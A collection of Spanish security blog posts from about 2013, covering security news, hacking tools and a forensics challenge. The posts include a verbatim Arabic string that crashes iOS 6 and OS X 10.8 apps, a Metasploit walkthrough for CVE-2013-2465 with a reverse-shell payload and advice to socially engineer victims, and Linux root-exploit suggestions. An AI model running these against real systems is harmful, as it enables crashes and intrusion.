El "texto de la muerte" para los usuarios de Apple

Más que el "texto de la muerte" para los usuarios de Apple esta entrada debería llamarse "el bug en CoreText que permite que una cadena de caracteres en árabe haga fallar a las aplicaciones de iOS 6 y Mac OS X 10.8".

Efectivamente, un error en el API de CoreText, el framework de renderizado de fuentes de Apple, provoca que la siguiente cadena de caracteres árabigos  سمَـَّوُوُحخ ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ (traducida Smoouhkh ̷̴̐ ̷̴̐ x x x ̷̴̐ Amartykh ̷̴̐ x) haga fallar cualquier aplicación de iOS y Mac OS que lo utilice.

Se ha confirmado la vulnerabilidad en Mac OS 10.8 (Mountain Lion) y iOS 6, de hecho, cualquier con ese SO no podrá leer este post puesto que el navegador se le habrá cerrado XD. Las versiones de iOS inferiores a 6 y 7 beta, Mac OS inferiores a 10.8 y 10.9 beta parecen no verse afectadas por este problema.
 

El fallo fue descubierto en un foro ruso hace un par de días, si bien parece que ya se conocía hace meses (hay tweets con esa cadena de caracteres desde febrero) y Apple no ha reaccionado.

...y para Linux permítame sugerirle el exploit...

¡Linux Exploit Suggester es un sencillo script en Perl que, basándose en la versión del kernel, identifica rápidamente las vulnerabilidades conocidas y sugiere exploits para conseguir root en una prueba de intrusión legítima. Bon appétit! 
 

# wget https://github.com/PenturaLabs/Linux_Exploit_Suggester/raw/master/Linux_Exploit_Suggester.pl

# uname -r
3.2.0-23-generic

# perl ./Linux_Exploit_Suggester.pl -k 3.2

Kernel local: 3.2

Possible Exploits:
[+] perf_swevent
   CVE-2013-2094
   Source: http://www.exploit-db.com/download/26131

Solucion al reto 18 "un pendrive y el caso de los coches robados"

Ante todo daros las gracias por lo bien que lo he pasado leyendo vuestros reportes en referencia a la solución del reto, ha habido de todo un poco... rápidas, acertadas, menos acertadas..."ha estao guay!!".

Como podréis haber visto la solución en cuestión no era nada difícil... y hemos querido darle aires de realidad enfrentándonos al problema desde un enfoque práctico y sencillo... pero os prometo que el próximo será más complicado.

Como acostumbramos veremos la manera más automática y rápida de hacerlo y la menos automática o, digamos, más artesanal.

Para resolver la ecuación tan solo teníamos la imagen iso de un pendrive, lo cual nos dejaba más o menos el camino claro y unas pocas incógnitas.

Deberíamos ver qué sistema de archivos era y luego montarlo... y si pensamos un poco más allá quizás recuperar archivos, etc, etc...

Es ahí donde llega nuestra primera decisión: pensar en una herramienta que nos dé todo en este tipo de problemas, es decir, el camino más corto que sería tirar de tool especializada o, como ya veremos, hacerlo más a pelo como a mí más me gusta.

Primera solución:

Creo que a estas alturas a la mente de todos nos llega AUTOPSY...
 
Autopsy es un frontal Web que permite realizar operaciones de análisis forense sirviendo como interfaz gráfico del popular juego de herramientas forenses The Sleuth Kit (TSK). TSK es un referente en el mundo del análisis forense mediante línea de comandos, y permite a los investigadores lanzar auditorías forenses no intrusivas en los sistemas a investigar. 

Ataques a impresoras 3D

El pasado viernes el investigador Claud Xiao presentó “Security Attack to 3D Printing” en la conferencia XCON 2013 en Pekin, que por el nombre podréis adivinar que se trata de una charla pionera en este tema. 

En la presentación se vieron algunos problemas de seguridad generales en los sistemas de impresión 3D y se presentaron tecnologías y herramientas para RepRap, un proyecto de código abierto para normalizar lo que sería una impresora 3D "doméstica". 

Además, en la parte final, se hicieron tres demostraciones sobre cómo modificar automáticamente la placa Arduino y el firmware de RepRap Mendel Prusa para cambiar su comportamiento.


Presentación (110 diapositivas):
http://www.claudxiao.net/Attack3DPrinting-Claud-en.pdf (inglés)
http://www.claudxiao.net/Attack3DPrinting-Claud-zh_cn.pdf (chino)

PoC:
https://github.com/secmobi/attack-arduino-and-reprap

Sí, tú casa está llena de dispositivos que pueden ser “hackeados” :)

"Y por fin llegó arrastrándose al sillón después de una dura jornada, buscó y rebuscó el mando entre los cojines y encendió su televisor. Un escalofrío precedió a un sin fin de pálpitos acelerados porque de repente se vio dentro de él con un mensaje que amenazaba "te estamos vigilando". Su primera reacción fue llamar a la policía pero, al descolgar el interfono, la pantalla led del teléfono IP mostraba el mismo mensaje "te estamos vigilando". Agarró su chaqueta y anduvo hacia la puerta con el único objetivo de escapar, pero la puerta automática hacia su salvación estaba bloqueada. El suspiro de resignación evidenció vapor al exhalar, la temperatura había disminuido y para rematar las luces desvanecían sumergiendo su cuerpo en la oscuridad de aquel pasillo. Dio tres pasos a ciegas y el pánico le invadió al percatarse de que unas extrañas luces le perseguían. Corrió a encerrarse dentro del cuarto de baño, la tapa del inodoro se levantó automáticamente y cayó fulminado al suelo..."

Fantasmas, extraterrestres, ... no, HACKERS!

Cada vez nuestros hogares se equipan con más y más electrodomésticos y gadgets que nos hacen la vida más fácil y que pueden controlarse desde Internet. No obstante si alquien fuera capaz de controlarlos veríamos absolutamente expuestos nuestra intimidad e incluso seguridad.

Lo que contaba al principio con ese breve relato podría provocarlo ya HOY un hacker y para demostrarlo queremos plantearos un modelo de casa corriente. La siguiente planta muestra un pequeño piso con una serie de modelos de dispositivos que pueden adquirirse en la actualidad. Cada uno de ellos tiene o ha tenido la vulnerabilidad brevemente descrita y en cada uno podéis ver las consecuencias...


¡Hogar, dulce hogar!

CVE-2013-2465 - Java storeImageArray() Invalid Array Indexing

Este módulo de Metasploit abusa de la vulneravilidad matriz indexación no válida en la función storeImageArray() de la función estática para producir una corrupción de memoria y finalmente evadir el Sandbox de Java. La vulnerabilidad afecta a Java versión 7u21 y versiones anteriores.


Explotando CVE-2013-2465 con Metasploit:// Cargamos el módulo

msf > use exploit/multi/browser/java_storeimagearray
msf exploit(java_storeimagearray) > set PAYLOAD java/meterpreter/reverse_tcp
msf exploit(java_storeimagearray) > set LHOST [IP Local]
msf exploit(java_storeimagearray) > set srvhost [IP Local]
msf exploit(java_storeimagearray) > set uripath /
msf exploit(java_storeimagearray) > exploit

Ahora realizamos un poco de Ingeniería Social para enviar la dirección generada por el metasploit para hacer la sesion meterpreter.

Saludos, \0/

Contribución gracias a Stuxnet Hack

Libro: historias de developers

Historias de Developers es un libro escrito por un buen puñado de empleados de Telefónica I+D en el que cada uno ha escrito un capítulo sobre cosas que creía que podrían ayudar a otros desarrolladores, pero también a otras personas que gestionan desarrolladores: motivación, testing, debugging & profiling, seguridad, ahorro de código, desarrollo móvil, …
 
 
En resumen estamos ante un libro gratuito bajo licencia cc con más de 380 páginas y 26 capítulos con muchas de las cosas que querrías saber acerca de cómo y qué hacen otros developers. ¡No te lo pierdas!

Disponible en Lulu.com: formato físico PDF ePub
Disponible en Amazon: Formato físico Kindle
Disponible en iBookStore: iBook

Cuidado con la extensión de Chrome de Series.ly...

Series.ly Extended es una extensión de Chrome que añade mejoras en series.ly, un portal español "de películas, series y documentales". Con este plugin podrás filtrar mejor los enlaces, obtener enlaces a torrents y funcionalidades durante la navegación... pero también (y lo que no dicen) contribuir a monetizar su contenido mediante enlaces ocultos, obtención de historial de navegación del usuario e inserción de publicidad no deseada.


Así lo confirma una entrada en stopmalvertising que advierte que este plugin utiliza scripts de Skimlinks y añade publicidad de los sitios s.m2pub.com, creative.m2pub.com, www.adcash.com (muy nombrado en enero por enlazar a varios sitios con malware) y ads.adpv.com en las páginas de descarga y streaming:

allmyvideos.net | bitshare.com | cinetube.es | divxonline.info | es.wuaki.tv | freakshare.com | google.es | imdb.com | mitele.es | nowvideo.eu | nubeox.com | played.to | series.ly | series21.com | streamcloud.eu | thepiratebay.sx | uploaded.net | youtube.com

Además en su última versión este plugin tiene permisos de actualización automática por lo que podrían añadirse cambios de forma casi inadvertida, así que moraleja, antes de instalar ésta o cualquier extensión desconfía...

ZMap: una herramienta que puede escanear todo Internet en menos de una hora

$ zmap -p 443 –o results.txt
34,132,693 listening hosts
(took 44m12s)
ZMap es una herramienta de código abierto desarrollada por un grupo de investigadores de la Universidad de Michigan con la cual es posible escanear TODO el espacio de direcciones IP versión 4 de Internet desde un único PC en tan sólo 45 minutos. 

Sí, has oído bien, todo Internet desde un único equipo con una conexión decente, es decir con una buena subida, es capaz de cubrir el 98% de direcciones ¡en menos de 1 hora!

¿Increíble verdad? Si lo comparamos con el modo más agresivo de Nmap, ZMap es 1300 veces más rápido y lo hace a grosso modo mediante diversas técnicas:

- Testing optimizado: envía conexiones tan rápido como soporte la tarjeta de red, saltando la pila TCP/IP y generando directamente frames Ethernet.
- No necesita guardar el estado de conexión: selecciona las direcciones de acuerdo a una permutación aleatoria generada por un grupo multiplicativo cíclico.
- No necesita retransmitir paquetes: siempre envía el mismo número de pruebas por host (normalmente por defecto sólo una).

¿Y qué aplicación tiene? Pues por ejemplo han realizado diversos estudios para ver la adopción de HTTPS, han descubierto miles y miles con UPnP vulnerables e incluso observado los efecto del huracán Sandy en la infraestructura de Internet.

Sólo una cosa, echad un vistazo a las buenas prácticas propuestas por sus desarrolladores y utilizarla con responsabilidad y de forma ética... my friends.


ZMap · The Internet Scanner
    Paper investigación
    Documentación
    Proyectos
    Descargas

“¿Y quién soy yo? Ese es un secreto que nunca revelaré.”- Gossip girl…HACKER

Nadie es como parece.

Uno a veces se mira sangrando en el asfalto, ve pasar la ambulancia y no la llama…y yo que ilusoriamente pensaba que ya sabía absolutamente TODO en la vida de hacking, mujeres, tramas y mafias. Bueno mas o menos, la verdad no tanto. Hay días donde tu pasado y tu presente se juntan y como buen Jedi Digital te pones en código rojo.

Queridos lectores de Hackplayers, hace tiempo que no tenía el placer de escribir en este blog, que sigo diariamente, y para el cual preparaba una entrada muy diferente;  sin embargo las circunstancias me orillaron a preparar un post, cuya historia debo seguir en tercera persona, y entonces, quién mejor que yo para contárselas??

Por supuesto, lo primero de todo es agradecer su preciado tiempo, atención y al staff por permitir relatarles lo sucedido, porque la historia en sí, es una historia de temática real (la cual pretendo mezclar con ciertas poses de generalidad para no afectar la privacidad de los personajes), que hasta el momento carece de final feliz o triste, pero como sabrán tiene mucho que ver con los temas que en este espacio son de interés.

Para comenzar a ponerlos en contexto quiero hacer una breve anotación; como sabrán por los posts que he escrito, soy un aficionado más a la seguridad de la información, me gusta mucho todo lo relacionado con ella, y tengo la fortuna de poder trabajar en ello profesionalmente, es una pasión que he adquirido desde mis años universitarios. Ni modo de negarles la cruz de mi parroquia. Toda mi sangre es wanna be IT expert qué quieren que haga.

Entonces, lo que pretendo contarles comenzó en un día laboral al parecer bastante normal y que en pocas palabras jamás podíamos imaginarnos que iba a pasar la monserga que hasta la fecha no tiene respuesta. Les quiero compartir que aunque tengo una formación ingenieril, soy una persona que no subestima la suerte, la sugestión, la superstición, las leyes de Murphy, como ustedes gusten llamarle. Como nota personal (nada que ver con el tema) no han sido unos meses del todo afortunados en varias cuestiones de mi vida privada, sólo que… cual programa de Extranormal (y por allá en España me parece que es algo así como Cuarto Milenio de Iker Jiménez) miren… hace muy poco tiempo, unas 4 semanas, guardé esta imagen de mi shell de Linux, al ejecutar cierto comando picaresco (jamás me había salido esa frase, me llamó mucho la atención). Ahora pienso profundamente… le hubiera hecho mucho más caso.


Han utilizado el comando fortune de Linux? Como las pitonisas griegas, creepy
 
Enter the shadow realm…

Convierte nmap es un completo escaneador de vulnerabilidades con vulscan

Hace tiempo hablamos de que nmap ya no era un simple escaneador de puertos gracias al NSE (Nmap Scripting Engine) que permite desarrollar scripts para
automatizar una amplia variedad de tareas de red incluido la posibilidad encontrar vulnerabilidades explotables en un sistema remoto.  


Vulscan es un módulo que precisamente "convierte" a nmap en un completo escaneador de vulnerabilidades.

La opción -sV permite la detección de versiones por servicio que se utiliza para determinar posibles deficiencias de acuerdo con el producto identificado. Los datos se buscan en una versión offline de varias bases de datos de vulnerabilidades en formato csv que se almacenan en Nmap\scripts\vulscan\*:

* scipvuldb.csv | http://www.scip.ch/en/?vuldb
* cve.csv | http://cve.mitre.org
* osvdb.csv | http://www.osvdb.org
* securityfocus.csv | http://www.securityfocus.com/bid/
* securitytracker.csv | http://www.securitytracker.com
* xforce.csv | http://xforce.iss.net
* expliotdb.csv | http://www.exploit-db.com
* openvas.csv | http://www.openvas.org


Su uso con nmap es tan sencillo como ejecutar:

D:\>nmap -sV --script=vulscan.nse 192.168.1.62 -p 3389

o si se prefiere, es posible especificar el uso de una única base de datos con los siguientes argumentos:

--script-args vulscandb=securityfocus.csv

Más opciones e información en la web del proyecto: www.computec.ch/projekte/vulscan/

Reto 18: un pendrive y el caso de los coches robados

La informática forense o análisis forense digital es la aplicación de técnicas científicas y analíticas especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y presentar datos que sean válidos dentro de un proceso legal.

Dichas técnicas incluyen reconstruir el bien informático, examinar datos residuales, autenticar datos y explicar las características técnicas del uso aplicado a los datos y bienes informáticos.

Despues de esta muletilla que me he "echao" a modo de introducción o explicación algo inútil, desde Hackplayers os animamos a que resolváis vuestro primer caso como forenses informáticos...

Good luck.

RDFU: un nuevo framework para la detección de bootkits en las "nuevas BIOS" (EFI)

Según reza la Wiki "La Interfaz Extensible del Firmware, Extensible Firmware Interface (EFI), es una especificación desarrollada por Intel dirigida a reemplazar la antigua interfaz del estándar IBM PC BIOS, que interactúa como puente entre el sistema operativo y el firmware base."

En 2005 se creó la fundación UEFI (Unified Extensible Firmware Interface) cuya labor consistía en desarrollar y promocionar esta plataforma EFI y hoy en día la mayoría de los sistemas operativos sobretodo de 64 bits lo soportan, de hecho se prevé que Windows 8 sustituya completamente la BIOS por EFI.

Evidentemente esta "modernización" del arranque de los PCs no ha pasado inadvertida para los desarrolladores de malware que han fijado UEFI como uno de sus grandes objetivos, más aún cuando la detección y/o erradicación de rootkits o bootkits es muy difícil.

Para combatir esta nueva amenaza Reversing Labs ha desarrollado Rootkit Detection Framework para UEFI (“RDFU”) que incorpora un conjunto de herramientas y drivers que tratan este problema a lo largo de un gran número de implementaciones UEFI:

- enumera todos los drivers EFI cargados en memoria
- comprueba rangos de memoria en busca de ejecutables
- monitoriza nuevos drivers cargados hasta que se inicia el sistema operativo
- lista EFI BOOT SERVICES y EFI RUNTIME SERVICE en busca de modicaciones en punteros de función
- supervisa continuamente EFI BOOT SERVICES y EFI RUNTIME SERVICE mientras que se carga el sistema operativo
- muestra el mapa de memoria y vuelca tosas las regiones adecuadas
- lista y monitoriza rellamadas de eventos que pueden ser utilizadas por rootkits/malware
- trabaja en modo standalone sin el shell EFI


Descargas:  White Paper | Blackhat 2013 Presentation | Source Code

Black hat SEO y #LasTetasDeRajoy

RT: ‏@Proscojoncio #LasTetasDeRajoy.
Primer titular que pensaron en ABC
tras elegir la foto para su portada
Hoy tenemos en Twitter el TT #LasTetasDeRajoy y todo por una "desafortunada" portada del ABC en la que se muestra una imagen del presidente en pleno footing haciendo gala de unos prominentes... pechos XD. A partir de ahí imaginaros el cachondeo y sobretodo la cantidad de mensajes circulando ahora mismo por la Red...

Pero no todo es guasa, imaginad la oportunidad que significa para un spammer o, aún peor, para un atacante mal intencionado que se aprovecha de una tendencia para publicar ante una numerosa audiencia alguno de sus enlaces maliciosos. 


Seguro que ya los habréis visto en más de una ocasión aprovechando alguna noticia de gran repercusión para colarse en los primeros puestos del buscador y ofrecer gentilmente su malware pero, ¿cómo lo hacen? Pues básicamente mediante el uso de técnicas no éticas de posicionamiento o Black Hat SEO como:

- La copia o duplicidad de contenidos, tanto si es una copia exacta como si en la copia se realizan ciertas modificaciones.

Hackers demuestran en video como manipulan un Toyota Prius

Últimamente está habiendo mucha controversia con todo lo que rodea al hacking de automóviles, sobre todo después de las esperadísimas charlas que dieron Zoz (en la foto) y Charlie Miller y Chris Valasek en la última conferencia de la Defcon en Las Vegas. Y no es para menos... en el siguiente vídeo Charlie y Chris se montan en el asiento trasero de un Toyota Prius y demuestran a su conductor, Andy Greenberg de Forbes, que son capaces de causar una serie de eventos, algunos de ellos muy peligrosos y que podrían causar un grave accidente...

El Prius tiene 35 unidades de control electrónico (ECU) y casi cada una de ellas tiene su propia función. Comprometiendo estos sistemas de forma individual se puede manipular el coche, normalmente haciéndole creer que un accidente está ocurriendo. Por ejemplo, los cinturones de seguridad pueden apretarse mediante el sistema de pre-colisión del vehículo, pueden mover el volante de forma repentina a un lado mediante la activación de la ayuda al estacionamiento automático o incluso desactivar por completo los frenos. Es decir, no hablamos sólo de tocar de forma automática el claxon o de subir el cristal de una ventanilla, esto es serio señores...


Relacionado:
Car hackers use laptop to control standard car
Hackers demonstrate Toyota Prius hijacking on video
Your Car Can Be Hacked And Here's What It Might Look Like: Video
Car Hacking: Here’s Code, Have at It
Car hacking code released at Defcon

Enruta todo el tráfico de tu máquina virtual por Tor con Tortilla


Tortilla es una herramienta de CrowdStrike que permite a los usuarios enrutar todo el tráfico TCP/IP de una máquina virtual a través de Tor de una forma segura y transparente.

Funciona en el sistema anfitrión bajo Windows XP y posteriores en versiones de 32 y 64 bits y es de código abierto, es decir, podemos revisarla y compilar nosotros mismos el proyecto de Visual Studio (podéis encontrar las instrucciones en el readme.txt).

Si optamos por utilizar directamente el binario decir que está firmado con un certificado de prueba y que por lo tanto primero tendremos que configurar nuestro sistema operativo (si es Vista o superior) para que acepte el correspondiente driver en modo kernel. De lo contrario recibiremos el siguiente mensaje:
 

BREACH o cómo romper HTTPS en sólo 30 segundos

BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext) es una nueva herramienta que utiliza una técnica mediante la cual es posible extraer tokens de logins, IDs de sesión y otra información sensible a partir de tráfico web cifrado SSL/TLS y en ¡sólo 30 segundos!.

Esto significa que podría permitir a un atacante descifrar fácilmente un canal HTTPS de un banco o de un sitio de venta online }:)



Fue presentada en la última conferencia Black Hat y se aprovecha varias vulnerabilidades de forma similar a lo que hacía CRIME con deflate, es decir, ataca al algoritmo de compresión aunque en las respuestas HTTP. Eso sí, como comentamos la información sensible ha de estar en las respuestas HTTP, el servidor por supuesto ha de utilizar compresión HTTP y el exploit requiere que la víctima visite primero un enlace malicioso.

Más información en: http://breachattack.com
Paper: http://www.iacr.org/cryptodb/archive/2002/FSE/3091/3091.pdf
Presentación: http://breachattack.com/resources/BREACH%20-%20BH%202013%20-%20PRESENTATION.pdf

Utilizan exploit para el navegador de Tor contra la pornografía infantil (y contra el anonimato de los usuarios de Tor)

EE.UU. ha presentado a Irlanda una solicitud de extradición de Eric Eoin Marques, un irlandés de 28 años dueño del ISP Freedom Hosting y, según el FBI, "el mayor distribuidor de pornografía infantil del planeta".

Freedom Hosting es el proveedor de hosting que más sitios .onion tiene dentro de la red de Tor y desde hace bastante tiempo se le acusa de alojar pornografía infantil. Ahora el FBI ha sido capaz de identificar a Eric pero ¿cómo ha sido capaz de trazarlo a través de Tor?

Como todos sabemos el diseño de la red de Tor asegura que el usuario no pueda saber dónde se localiza el servidor y que el servidor no pueda saber la dirección IP del usuario... al menos que se inserte código de rastreo o tracking en las páginas web del servidor...

Esto es precisamente lo que se ha descubierto el algunos sitios del proveedor Freedom Hosting, concretamente código Javascript para explotar un bug de la versión Firefox 17 ESR (que es el que se basa el Tor Browser oficial) y que permite obtener la IP real del usuario que navega a través de Tor (después envía la información a una IP en Reston, Virginia) a parte de cargar un payload para instalar malware en el equipo de la víctima. Podéis ver un análisis en detalle aquí.

Precisamente se especula que este código haya podido ser generado por el propio FBI lo que le ha podido facilitarles una gran victoria contra la pederastia aunque a su vez generar muchas suspicacias al "desanonimizar" a otros usuarios que utilizan la red Tor con mejores fines. ¿El fin justifica los medios?


Fuentes:
Hidden Services, Current Events, and Freedom Hosting
Almost Half of TOR sites compromised by FBI [Exclusive details]